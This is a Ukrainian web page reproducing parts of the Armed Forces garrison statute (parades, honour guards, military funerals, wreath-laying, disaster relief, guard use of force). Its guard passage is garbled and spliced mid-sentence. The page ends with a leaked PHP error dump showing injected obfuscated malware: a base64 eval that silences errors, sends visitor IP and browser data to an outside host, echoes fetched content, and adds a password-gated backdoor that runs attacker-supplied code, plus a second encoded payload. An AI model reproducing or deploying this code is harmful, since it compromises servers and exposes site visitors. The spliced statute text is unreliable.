Гарнізонні заходи за участю військ.

Український легіон » Дисципліни » Статут ЗСУ » Гарнізонні заходи за участю військ.

1. Паради військ. Почесні варти.

     Паради військ проводяться на відзнаку держав­них свят, а також важливих подій державного та війсь­кового значення за особливим розпорядженням Мініст­ра оборони України.

    Склад військ, які беруть участь у параді, час і місце параду, форма одягу й інші організаційні питання визначаються у кожному окремому випадку наказом начальника гарнізону. У наказі зазначаються також порядок проведення артилерійського салюту (феєрвер­ка), якщо він передбачений.

      Для командування військами, які беруть уч'асть у параді, призначається командувач параду.

     Військовослужбовці, підрозділи та військові частини, які беруть участь у параді, діють за правила­ми, визначеними у Стройовому статуті Збройних Сил України.

     Почесною вартою називається підрозділ (коман­да), призначений для віддання військових почестей. Вона призначається для зустрічі осіб, визначених статутом; до Бойового Прапора, який вино­сять на урочисті засідання; під час відкриття державних пам'ятників; для зустрічі та проводів представників іноземних держав, а також під час поховання осіб, ви­значених статутом.

     Почесна варта призначається наказом начальни­ка гарнізону, командира військової частини. Для зуст­річі та проводів представників іноземних держав почесна варта призначається за особливою вказівкою команду­вача виду Збройних Сил України, військ оперативного командування.

     До складу почесної варти призначаються під­розділи від взводу до роти та військовий оркестр. Почес­на варта також призначається із офіцерів та прапорщи­ків або сержантів.

Начальниками почесних варт призначаються офіцери. Форма одягу, озброєння особового складу почесної варти встановлюється начальником гарнізону. Боєпри­паси особовому складові почесної варти не видають.

     Почесні варти підпорядковуються начальникові гарнізону та військовому комендантові гарнізону.

     Особовий склад почесної варти, віднарядженої для зустрічі та проводів осіб,  діє за правилами, визначеними у Стро­йовому статуті Збройних Сил України.

     На урочисті засідання, куди за вказівкою началь­ника гарнізону (командира військової частини) вино­ситься Бойовий Прапор (прапори), до прапора (прапо­рів) віднаряджується почесна варта та два-три прапо­роносці (залежно від змін вартових). Чатові почесної;

варти виструнчуються поряд із Бойовим Прапором. (прапорами) обіруч від нього, тримаючи автомати в по­ложенні «на груди» або карабіни — «до ноги»..

      Для супроводження Бойового Прапора до місця про­ведення засідання й назад, до військової частини, при­значається прапороносний взвод.

Винесення й віднесення Бойового Прапора прово­диться за правилами, визначеними Стройовим статутом Збройних Сил України.

      Зміна чатових почесних варт і прапороносців про­водиться кожні 15 хвилин. Команди для зміни не по­даються, і здавання посту не проводиться. Чатовими почесних варт і прапороносцями військове вітання не виконується.

 

2.  Віддання військових почестей під час поховання. Покладання вінків до пам"ятників і могил воїнів.

       Військовий підрозділ, призначений для віддання військових почестей під час поховання військовослуж­бовців, утворює почесний ескорт.

       Почесний ескорт віднаряджується у разі похо­вання військовослужбовців, громадян, які померли під час проходження військової служби, та померлих внас­лідок каліцтва (поранення, травми, контузії).

Крім того, почесний ескорт віднаряджується під час поховання генералів (адміралів), старших офіцерів, звільнених із військової служби з правом носіння війсь­кової форми одягу, які мають загальний строк військо­вої служби 25 років і більше, а також громадян, що мали великі заслуги перед державою.

       Померлі (загиблі) військовослужбовці ховаються, за місцем їх останньої служби. Перевезення тіла військо­вослужбовця, який загинув у мирний час під час вико­нання військового (громадянського) обов'язку або помер від загальних захворювань, до іншого місця поховання (перепоховання) здійснюється за рахунок Державного бюджету за рішенням командувача військ оперативного командування, а військовослужбовця, який помер або загинув за межами України, - за рішенням Міністра оборони України.

      Організація похорону військовослужбовців, які померли під час перебування на військовій службі, по­кладається на їх прямих начальників, а інших осіб, під час поховання яких призначається почесний ескорт, — на начальника гарнізону (на міських або районних військових комісарів).

       Покладання вінків делегаціями військових час­тин до пам'ятників і могил воїнів, які полягли в боях за волю та незалежність України, проводиться у дні державних свят, а в інші дні — за рішенням Міністра оборони України.

       Під час покладання вінків державними, урядови­ми та військовими делегаціями розпорядженням началь­ника гарнізону призначається почесна варта з одним або кількома бойовими прапорами військових частин гарні­зону та оркестр.

      Перед покладанням вінків до пам'ятника (моги­ли) з почесної варти в призначений час виставляється одна-дві пари чатових. Чатові стоять у положенні «струнко», тримаючи автомати у положенні «на груди» або карабіни у положенні «до ноги».

Почесна варта вишиковується в дві шеренги перед пам'ятником (могилою) фронтом або правим флангом до нього залежно від розташування пам'ятника (мо­гили).

Бойові прапори ставлять на правому фланзі почесної варти, оркестр — праворуч від прапорів.

     Делегація з вінком вишиковується у визначеному місці й рухається до пам'ятника (могили), проходячи перед почесною вартою. Попереду делегації йде військо­вий комендант гарнізону або офіцер почесної варти. За ним на відстані двох-трьох кроків — особи, які несуть вінок, а далі на такій самій відстані—делегація по три-п'ять осіб у колоні.

      З найближенням делегації з вінком на 40—50 кроків до почесної варти начальник варти командує: «ВартаРІВНЯЙСЬ, СТРУНКО, рівняння—ПРАВОРУЧ (ЛІ­ВОРУЧ)». Оркестр виконує жалобно-урочисті мелодії. Бойові прапори схиляють наперед.

      З підходом до пам'ятника (могили) делегація кладе вінок. Оркестр припиняє грати. Хвилиною мов­чання вшановується пам'ять загиблих. Після хвилини мовчання виконується Державний Гімн України; делегація відходить від пам'ятника (могили), вишиковується обличчям до варти, а почесна варта за командою на­чальника варти стає в похідну колону й проходить уро­чистим маршем повз пам'ятник (могилу) й осіб, які по­кладали вінок.

      Під час покладання вінків делегаціями іноземних держав жалобно-урочисті мелодії виконуються лише за погодженням із керівником делегації. Після хвилини мовчання виконується гімн держави, делегація якої покладає вінок, і Державний Гімн України.

Розпорядженням начальника гарнізону під час по­кладання вінків іноземними делегаціями почесна варта й оркестр можуть не призначатися; тоді до пам'ятника (могили) виставляється одна-дві пари чатових і в разі потреби призначається офіцер з двома військовослуж­бовцями для доставлення вінка до місця його покладан­ня.

      Іноземні військові делегації під час покладання вінків до пам'ятників і могил воїнів супроводжують представник Міністерства оборони України та військо­вий комендант гарнізону.

 

1.     Залучення військ для боротьби з пожежами, стихійним лихом.

      Війська залучаються для боротьби з пожежами, стихійним лихом та для подання допомоги-населенню, яке потерпіло від пожежі або стихійного лиха, розпо­рядженням командувача військ оперативного команду­вання за рішенням Міністра оборони України.

      Перед військами, призначеними для боротьби з пожежею, стихійним лихом або для подання допомоги населенню, начальник гарнізону ставить завдання, у яко­му визначає: у підпорядкування якого командира (на­чальника) переходить військова частина (підрозділ), спосіб пересування, наявні технічні засоби, строк вико­нання поставленого завдання, озброєння, форму одягу, порядок постачання, порядок підтримання зв'язку.

      Після прибуття до місця призначення командири військових частин або підрозділів повинні негайно з'яви­тися до посадової особи, у розпорядження якої вони переходять, та за вказівкою цієї особи організувати ви­конання поставленого завдання.

      Командири військових частин (підрозділів) можуть виконувати завдання самостійно, узгоджуючи свої дії з органами виконавчої влади та органами місцевого самоврядування.

      Про виконання завдання командири військових час­тин (підрозділів) доповідають начальникові гарнізону та своєму безпосередньому начальникові.'

     Для охорони майна розпорядженням командира військової частини (підрозділу), призначеної для бо­ротьби з пожежею або стихійним лихом, віднаряд-жуються тимчасові варти. Ці варти, підпорядковуються командирові військової частини (підрозділу), від якої вони віднаряджені, начальникові гарнізону, військово­му комендантові та черговому варт (черговому військо­вої частини) і несуть службу на загальних підставах.

     Заборонено підпорядковувати військові частини, підрозділи або команди представникам органів виконав­чої влади  та органам місцевого самоврядування.

Застосування фізичної сили та зброї особовим складом ватри.

Застосуванню фізичної сили, вогнепальної та холодної зброї, якщо дозволяють обставини, мають передавати попередження про намір їх виконання. Без попередження фізичну силу, зброю можуть застосовувати у разі виникнення загрози життю або здоров‘ю військовослужбовців, нападу на чатового, на об‘єкти, які охороняють, вартове приміщення або зміну, що прямує до постів (з постів).

За неможливості уникнення застосування сили (зброї) це не повинно перевищувати міри, необхідної для виконання покладених на чатових обов‘язків. У разі заподіяння чатовим шкоди особовий склад варти забезпечує в найкоротший строк подання потрібні допомоги потерпілим.

Про застосування фізичної сили (зброї) чатовий або розвіданий негайно доповідає начальникові варти, а начальник варти - черговому варт (черговому військової частини).

Перевищення повноважень у застосуванні сили  (зброї) має наслідком відповідальність, встановлену законом України.

Чатовим застосовується зброя без попередження у разі явного нападу на нього або на об‘єкт, який він охороняє.

Усіх осіб, які наближаються до поста або до забороненої зони, позначеної покажчиками, крім начальника варти, помічника начальника варти, свого розвідного та осіб, яких вони супроводжують, чатовий зупиняє вигуком "Стій, назад" або "Стій, обійти справа (зліва)".

За невиконання особою, яка наближається до поста або до забороненої зони, цієї вимоги чатовий попереджає порушника вигуком "Стій, стрілятиму" не розмовляти із заарештованими, нічого не передавати їм і нічого не брати від них;

Не допускати розмов заарештованих із сторонніми особами;

Негайно викликати начальника варти, його помічника або розвідного у разі невиконання заарештованими його вимог;

Прийнявши прохання заарештованого про виклик вивідного, доповісти про це своєму розвідному (начальникові ватри або його помічникові);

Попереджувати заарештованого при його спробі втекти вигуком "Стій стрілятиму", а у разі невиконання цієї вимоги застосувати зброю для його затримання.

Під час перевезення заарештований з одного пункту в інший, а також під час пересування їх поза гауптвахтою обов‘язки чатового з охорони заарештованих виконує конвойний.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0163 s(22 Requests)
  PHP: 0,6591 s 
  Total: 0,6754 s